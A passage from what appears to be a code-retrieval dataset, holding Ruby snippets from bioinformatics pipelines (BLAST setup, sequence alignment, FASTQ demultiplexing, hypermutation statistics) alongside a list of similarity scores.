@ungapped_alignment = params['ungappedalign'] ? 'F' : 'T'\n @e_thresh = params['evalfirstit']\n @smith_wat = params['smithwat'] ? 'T' : 'F'\n @rounds = params['rounds']\n @fastmode = params['fastmode'] ? 'T' : 'F'\n @alignment = \"\"\n \n # init genome db parameter\n # getDBs is part of the GenomesModule\n gdbs = getDBs('pep')\n logger.debug(\"SELECTED GENOME DBS\\n\")\n logger.debug gdbs.join(\"\\n\")\n @db_path += ' ' + gdbs.join(' ')\n\n\n # Write confidence parameter to file in temp directory\n File.open(@basename + \".csiblast_conf\", \"w\") do |file|\n file.write(@e_thresh)\n end\n # set file rights ugo+rxw\n system(\"chmod 777 #{@basename}.csiblast_conf\")\n # if input is alignment call method process_alignment\n if (@inputmode == \"alignment\") then process_alignment end\n\n # set gapopen and gapextend costs depending on given matrix\n # default values\n @gapopen = 11\n @gapext = 1\n if (@mat_param =~ /BLOSUM80/i || @mat_param =~ /PAM70/i) then @gapopen = 10 end\n if (@mat_param =~ /PAM30/i) then @gapopen = 9 end\n if (@mat_param =~ /BLOSUM45/i) \n @gapopen = 15\n @gapext = 2\n end \n \n end",
"def calc_global_stats()\n\n #common set of genes\n \n core_genes_ids = [110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216]\n \n self.genes_core = Gene.find(:all, :conditions => { :id => core_genes_ids })\n self.genes_all = Gene.find(:all)\n #puts \"genes: #{genes.inspect}\"\n\n self.taxons_cnt = NcbiSeqsTaxon.count(:distinct => true)\n puts \"taxons_cnt: #{taxons_cnt}\"\n\n\n #img_tot_cnt\n self.itc_hsh = ProkGroup.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[c.id] = c.img_tot_cnt }\n\n\n #prok group taxon number\n #all small n as constant\n #self.pgtn_hsh = Taxon.joins(:ncbi_seqs_taxon) \\\n # .joins(:taxon_group) \\\n # .group(\"prok_group_id\") \\\n # .select(\"prok_group_id, count(*) as cnt\") \\\n # .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n\n self.pgtn_hsh_core = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n\t\t\t\t\t where gbs.GENE_ID in (110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216)\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\nself.pgtn_hsh_all = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n \n \n \n #puts @pgtn_hsh.inspect\n\n #prok group sequence number\n #find nb of sequences in group\n #debug\n #Rails.logger.level = 0 # at any time\n self.pgsn_hsh_all = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n \n self.pgsn_hsh_core = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .where({ \"GENE_BLO_SEQS.gene_id\" => core_genes_ids }) \\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n #puts @pgsn_hsh.inspect\n \n \n #exit(0)\n #debug\n #Rails.logger.level = 2 # at any time\n\n\n end",
"def start_setup\n\t\tread_config()\n\n\t\tputs \"Initializing annotation for project: #{self.project_file_name} ...\"\n\t\tputs \"=================================\"\n\n\t\tif add_annotation_target()\n\t\t\tputs \"=================================\"\n\t\t\tputs \"Annotation initialization for project #{self.project_file_name} done.(●'◡'●)ノ♥\"\n\t\tend\n\tend",
"def initialize(protname_length_pairs, condition_to_count_array)\n @protname_length_pairs = protname_length_pairs\n @condition_to_count_array = condition_to_count_array\n end",
"def initialize(instr = NYLON_ACOUSTIC, \n tuning = EADGBE,\n bpm = 140, # sounds okay with \n note = \"eighth\") # most tabs...\n @tuning = tuning\n @seq = MIDI::Sequence.new\n @seq.tracks << (ctrack = MIDI::Track.new(@seq))\n @seq.tracks << (@track = MIDI::Track.new(@seq))\n @note = note\n\n @notes = { 's' => 'sixteenth', 'e' => 'eighth', 'q' => 'quarter', 'h' => 'half', 'w' => 'whole' }\n\n ctrack.events << MIDI::Tempo.new(MIDI::Tempo.bpm_to_mpq(bpm))\n ctrack.events << MIDI::ProgramChange.new(0,instr,0)\n ctrack.events << MIDI::ProgramChange.new(1,instr,0)\n ctrack.events << MIDI::ProgramChange.new(2,instr,0)\n ctrack.events << MIDI::ProgramChange.new(3,instr,0)\n ctrack.events << MIDI::ProgramChange.new(4,instr,0)\n ctrack.events << MIDI::ProgramChange.new(5,instr,0)\n\n @prev = [nil] * 6\n @prev_dist = [0] * 6\n end",
"def initialize(params)\n @byr = params['byr']&.to_i\n @iyr = params['iyr']&.to_i\n @eyr = params['eyr']&.to_i\n if params.key?('hgt')\n @hgt = if (md = /\\A(?<value>\\d+)(?<unit>cm|in)\\z/.match(params['hgt']))\n [md['value'].to_i, md['unit']]\n else\n params['hgt']\n end\n end\n\n @hcl = params['hcl']\n @ecl = params['ecl']\n @pid = params['pid']\n @cid = params['cid']\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug \"Attempting to fix gag at position #{gag.position} in sequence #{seq_id}, which is #{seq.length} bases long\"\n fixed = fixed+seq[last_gag..(gag.position-1)]\n fixed = fixed+seq[(gag.position-1)..(gag.position-1)]\n last_gag = gag.position\n #log.debug \"After fixing gag at position #{gag.position}, fixed sequence is now #{fixed}\"\n end\n fixed = fixed+seq[last_gag..(seq.length-1)]\n fixed_sequences[seq_id] = fixed\n end\n end\n \n unless accounted_for_seq_ids.length == sequence_id_to_gags.length\n log.warn \"Unexpectedly found GAG errors in sequences that weren't in the sequence that are to be fixed: Found gags in #{sequence_id_to_gags.length}, but only fixed #{accounted_for_seq_ids.length}\"\n end\n return fixed_sequences\n end",
"def initialize(options = {})\n super\n @queue_values = {}\n @key_assignments = {}\n @largest_seen_values = {}\n @smallest_seen_values = {}\n @rng_seed = options[:rng_seed] || Random.new_seed\n end",
"def initializeResultVariables()\n @totalReadsProduced = 0 # Total reads\n @numDuplicateReads = 0 # Num. duplicate reads\n @perDuplicateReads = 0 # Percentage of duplicate reads\n @numAlignedReads = 0 # Num. of reads aligned\n @perAlignedReads = 0 # Percentage of reads aligned\n @numReadsPaired = 0 # Total pairs of reads\n @numReadAndMatePaired = 0 # Read pairs with mapped mates\n @numBufferAlignedReads = 0 # Num. reads aligned on buffer\n @perBufferAlignedReads = 0 # Percentage of reads aligned on buffer\n @numTargetAlignedReads = 0 # Num. reads aligned on target\n @perTargetAlignedReads = 0 # Percentage of reads aligned on target\n @avgCoverage = 0 # Average coverage\n @numReadsTargetBuffer = 0 # Num. reads hitting target or buffer\n @perReadsTargetBuffer = 0 # Percentage of reads hitting target or buffer\n @totalExpAlignedReads = 0 # Total expected number of aligned reads\n @totalCalcAlignedReads = 0 # Total calculated number of aligned reads \n @numTargetsHit = 0 # Number of targets hit\n @perTargetsHit = 0 # Percentage of targets hit\n @numTargetBuffersHit = 0 # Num. target buffers hit\n @perTargetBuffersHit = 0 # Percentage of target buffers hit\n @numTotalTargets = 0 # Number of total targets\n @numNonTarget = 0 # Number of non-target hits with high coverage\n @numTargetedBases = 0 # Number of bases targeted\n @numBufferBases = 0 # Number of buffer bases\n @numBases1Coverage = 0 # Num. bases with 1+ coverage\n @perBases1Coverage = 0 # Percentage of bases with 1+ coverage\n @numBases4Coverage = 0 # Percentage of bases with 4+ coverage\n @perBases4Coverage = 0 # Percentage of bases with 4+ coverage\n @numBases10Coverage = 0 # Num. bases with 10+ coverage\n @perBases10Coverage = 0 # Percentage of bases with 10+ coverage\n @numBases20Coverage = 0 # Num. bases with 20+ coverage\n @perBases20Coverage = 0 # Percentage of bases with 20+ coverage\n @numBases40Coverage = 0 # Percentage of bases with 40+ coverage\n @perBases40Coverage = 0 # Percentage of bases with 40+ coverage\n end",
"def default_job_params\n {\n rna_extraction_kit: QIAampDSPViralRNAMiniKit::NAME\n }\n end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation succeded.\"\t\n\tend",
"def a3g_hypermut(ref = nil)\n # mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n # total G->A mutations at apobec3g/f positions.\n total = 0\n\n unless ref \n # make consensus sequence for the input sequence hash\n ref = self.consensus\n end\n\n # obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n self.dna_hash.each do |k,v|\n a = 0 # muts\n b = 0 # potential mut sites\n c = 0 # control muts\n d = 0 # potenrial controls\n mut.each do |n|\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = ViralSeq::Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = [k, a, b, c, d, rr.round(2), perc]\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if self.dna_hash.size > 200\n rate = total.to_f/(self.dna_hash.size)\n count_mut = mut_hash.values.count_freq\n maxi_count = count_mut.values.max\n poisson_hash = ViralSeq::Math::PoissonDist.new(rate,maxi_count).poisson_hash\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = self.dna_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = ViralSeq::SeqHash.new\n hm_hash.each do |k,_v|\n hm_seq_hash.dna_hash[k] = self.dna_hash[k]\n end\n \n hm_seq_hash.title = self.title + \"_hypermut\"\n hm_seq_hash.file = self.file\n filtered_seq_hash = self.sub(self.dna_hash.keys - hm_hash.keys)\n return { a3g_seq: hm_seq_hash,\n filtered_seq: filtered_seq_hash,\n stats: hm_hash.values\n }\n end",
"def initialize(number)\n @range = (1..number)\n # Now the behavior of the robot is being driven\n # by configuration data! And there's just one\n # place we can change to change behavior. :)\n @format_data = { \"fuzz\" => 3, \"bizz\" => 5 }\n end",
"def initialize phenotype_count, orthogroup_count, storage_count\n # Make sure to provide storage_count + phenotype_count as the initial capacity, since otherwise a resize will be needed.\n super([phenotype_count, orthogroup_count], 0, capacity: storage_count+phenotype_count+1, stype: :yale, dtype: :byte)\n @skip_table = {}\n end",
"def compute\n index(@ref, @ref_base, @software, @annotation)\n\n if @err_rate > 0\n bucketized_alignment\n else # software == :star || err_rate == 0\n unbucketized_alignment\n end\n end",
"def scan_gene_blo_seqs\n GeneBloSeq.destroy_all\n\n genes = Gene.find(:all)\n\n genes.each { |gn|\n\n #assemble gene file location\n gene_blo_runs_f = \"#{AppConfig.gene_blo_runs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_f = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.fasta\"\n gene_blo_seqs_p = \"#{AppConfig.gene_blo_seqs_dir}/#{gn.name}.phy\"\n\n \n gene_blo_runs_oa = @ud.fastafile_to_original_alignment(gene_blo_runs_f)\n gene_blo_seqs_oa = Bio::Alignment::OriginalAlignment.new\n\n\n\n puts \"gn.seqs_orig_nb:#{gn.seqs_orig_nb} oa_size: #{gene_blo_runs_oa.size}\"\n\n #schould be equal\n #should insert assertion here or make an rspec to detect source\n #puts oa.keys\n\n gene_blo_runs_oa.each_pair { |key, seq|\n puts key, seq\n gbs = GeneBloSeq.new\n #find corresponding gi\n ns = NcbiSeq.find_by_vers_access(key)\n #link to objects gene and gi\n gbs.gene = gn\n gbs.ncbi_seq = ns\n gbs.save\n gene_blo_seqs_oa.add_seq(seq,ns.id)\n\n }\n \n #save fasta file \n @ud.string_to_file(gene_blo_seqs_oa.output(:fasta),gene_blo_seqs_f)\n #save phylip file\n @ud.string_to_file(gene_blo_seqs_oa.output(:phylip),gene_blo_seqs_p)\n\n\n\n\n }\n\n end",
"def initialize(num_legs)\n\t\t@tabletop = []\n @num_legs = num_legs\n \tend",
"def align=(_arg0); end",
"def prepare_anchorpairs(input_file, anchor_length, sequencing_type, output_file)\t\n\t\tname, mate, seq, quality = nil, nil, nil\n\t\tcounter = -1\n\n\t\tFile.open(output_file, 'w') do |output| \n\t\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\t\tcounter += 1\n\t\t\t\tline = line.strip\n\t\t\t\n\t\t\t\tif counter % 4 == 0 \n\t\t\t\t\tif sequencing_type == 'se'\n\t\t\t\t\t\tname, mate = line.strip, 1\n\t\t\t\t\telse\n\t\t\t\t\t\tname, mate = line.strip.split('/')\n\t\t\t\t\tend\n\t\t\t\telsif counter % 4 == 1\n\t\t\t\t\tseq = line\n\t\t\t\t\n\t\t\t\telsif counter % 4 == 3\n\t\t\t\t\tquality = line\n\t\t\t\n\t\t\t\t\tname_A = \"#{name}_#{mate}_#{seq}_A\"\n\t\t\t\t\tname_B = \"#{name}_#{mate}_#{seq}_B\"\n\t\t\t\n\t\t\t\t\tseq_A = seq[0..anchor_length - 1]\n\t\t\t\t\tseq_B = seq[-anchor_length..-1]\n\t\n\t\t\t\t\tquality_A = quality[0..anchor_length - 1]\n\t\t\t\t\tquality_B = quality[-anchor_length..-1]\n\t\t\t\n\t\t\t\t\toutput.puts [name_A, seq_A, '+', quality_A, name_B, seq_B, '+', quality_B].join(\"\\n\")\n\t\t\t\t\n\t\t\t\t\tname, mate, seq, quality = nil, nil, nil\n\t\t\t\t\tcounter = -1\n\t\t\t\tend \n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Anchor preparation finished.\"\t\n\tend",
"def initialize ( params = {})\r\n @parent1 = params.fetch(:p1,\"xxx\")\r\n @parent2 = params.fetch(:p2,\"xxx\")\r\n @f2_wild = params.fetch(:f2wild,\"xxx\")\r\n @f2_p1 = params.fetch(:f2p1,\"xxx\")\r\n @f2_p2 = params.fetch(:f2p2,\"xxx\")\r\n @f2_p1p2 = params.fetch(:f2p1p2,\"xxx\")\r\n \r\n\r\n @@almacen[parent1]=self \r\n end"
] |
[
"0.52725923",
"0.5269229",
"0.5243173",
"0.515901",
"0.51487947",
"0.50884366",
"0.5077564",
"0.49884474",
"0.49591947",
"0.49542058",
"0.4874891",
"0.4868386",
"0.48597658",
"0.48050168",
"0.47810596",
"0.475977",
"0.47541583",
"0.4708687",
"0.4702784",
"0.47009873",
"0.4695017",
"0.46896684",
"0.46887237",
"0.4688386",
"0.4654672",
"0.4651437",
"0.46494",
"0.4630566",
"0.46213827",
"0.46120042",
"0.46105674",
"0.4609967",
"0.46021792",
"0.45927027",
"0.45919967",
"0.45844275",
"0.45818254",
"0.45790872",
"0.457898",
"0.45782483",
"0.45782483",
"0.45782483",
"0.4577523",
"0.45688742",
"0.45599958",
"0.45518917",
"0.45438188",
"0.4541336",
"0.4538555",
"0.45382866",
"0.4513586",
"0.45130613",
"0.45074013",
"0.45066732",
"0.44985506",
"0.44942066",
"0.44927147",
"0.44777802",
"0.44759578",
"0.44602448",
"0.44564822",
"0.44561324",
"0.4455113",
"0.44545588",
"0.44407436",
"0.4438085",
"0.44376147",
"0.44350573",
"0.44341657",
"0.44250584",
"0.44223714",
"0.44140095",
"0.4409323",
"0.44005615",
"0.44001326",
"0.4387706",
"0.43856826",
"0.43653738",
"0.4361151",
"0.43513563",
"0.43497908",
"0.43477443",
"0.43450513",
"0.4342425",
"0.43396828",
"0.43311048",
"0.43310705",
"0.43283108",
"0.4324153",
"0.43125957",
"0.43111324",
"0.43105653",
"0.43079716",
"0.4305842",
"0.43041614",
"0.4294729",
"0.42875984",
"0.42858127",
"0.4285046",
"0.42817554"
] |
0.6461289
|
0
|
Performs genomic alignment. As Tophat only allows for an absolute number of errors, reads will be split into several files according to
|
def compute
index(@ref, @ref_base, @software, @annotation)
if @err_rate > 0
bucketized_alignment
else # software == :star || err_rate == 0
unbucketized_alignment
end
end
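
# A minimal sketch of the bucketing idea implied above, assuming reads are
# grouped by length so that each group shares the same absolute mismatch
# budget (length * err_rate, rounded down). The helper name and the
# [lower, upper, mismatches] return shape are illustrative assumptions,
# not taken from this codebase.
def bucketize_by_error_rate(read_lengths, err_rate)
  read_lengths
    .group_by { |len| (len * err_rate).floor } # absolute mismatches allowed
    .map { |mismatches, lens| [lens.min, lens.max, mismatches] }
    .sort_by { |_lower, _upper, mismatches| mismatches }
end

# Example: at a 4% error rate, 36-40 bp reads tolerate 1 mismatch, a 51 bp
# read tolerates 2, and a 75 bp read tolerates 3, giving three buckets:
# bucketize_by_error_rate([36, 40, 51, 75], 0.04)
# #=> [[36, 40, 1], [51, 51, 2], [75, 75, 3]]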
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def genome(liszt)\n=begin\n[samopen] SAM header is present: 2 sequences\n7621912 reads; of these:\n 4009241 (52.60%) were paired; of these:\n 1983557 (49.47%) aligned concordantly 0 times\n 1818685 (45.36%) aligned concordantly exactly 1 time\n 206999 (5.16%) aligned concordantly >1 times\n ----\n 1983557 pairs aligned concordantly 0 times; of these:\n 409503 (20.64%) aligned discordantly 1 time\n ----\n 1574054 pairs aligned 0 times concordantly or discordantly; of these:\n 3148108 mates make up the pairs; of these:\n 1009275 (32.06%) aligned 0 times\n 35392 (1.12%) aligned exactly 1 time\n 2103441 (66.82%) aligned >1 times\n 3612671 (47.40%) were unpaired; of these:\n 498719 (13.80%) aligned 0 times\n 2246121 (62.17%) aligned exactly 1 time\n 867831 (24.02%) aligned >1 times\n=end\n #puts(liszt);exit\n dict={}; liszt.shift\n dict[\"total\"]=liszt.shift.split[0]; #liszt.shift\n dict[\"paired\"]=liszt.shift.split[0]; liszt.shift #conc 0\n dict[\"conc_once\"]=liszt.shift.split[0]\n dict[\"conc_mult\"]=liszt.shift.split[0]\n liszt.shift(2); dict[\"disc_once\"]=\"\"; dict[\"disc_mult\"]=\"\"\n line=liszt.shift\n line.include?(\">1 times\") ? dict[\"disc_mult\"]=line.split[0] : dict[\"disc_once\"]=line.split[0]\n liszt.shift\n dict[\"unaligned_pairs\"]=liszt.shift.split[0]\n liszt.shift\n dict[\"unmates\"]=liszt.shift.split[0] #unaligned mates\n dict[\"mate_once\"]=liszt.shift.split[0]\n dict[\"mate_mult\"]=liszt.shift.split[0]\n dict[\"unpaired\"]=liszt.shift.split[0]\n dict[\"unpair_unaligned\"]=liszt.shift.split[0]\n dict[\"unpair_once\"]=liszt.shift.split[0]\n dict[\"unpair_mult\"]=liszt.shift.split[0]\n dict\nend",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
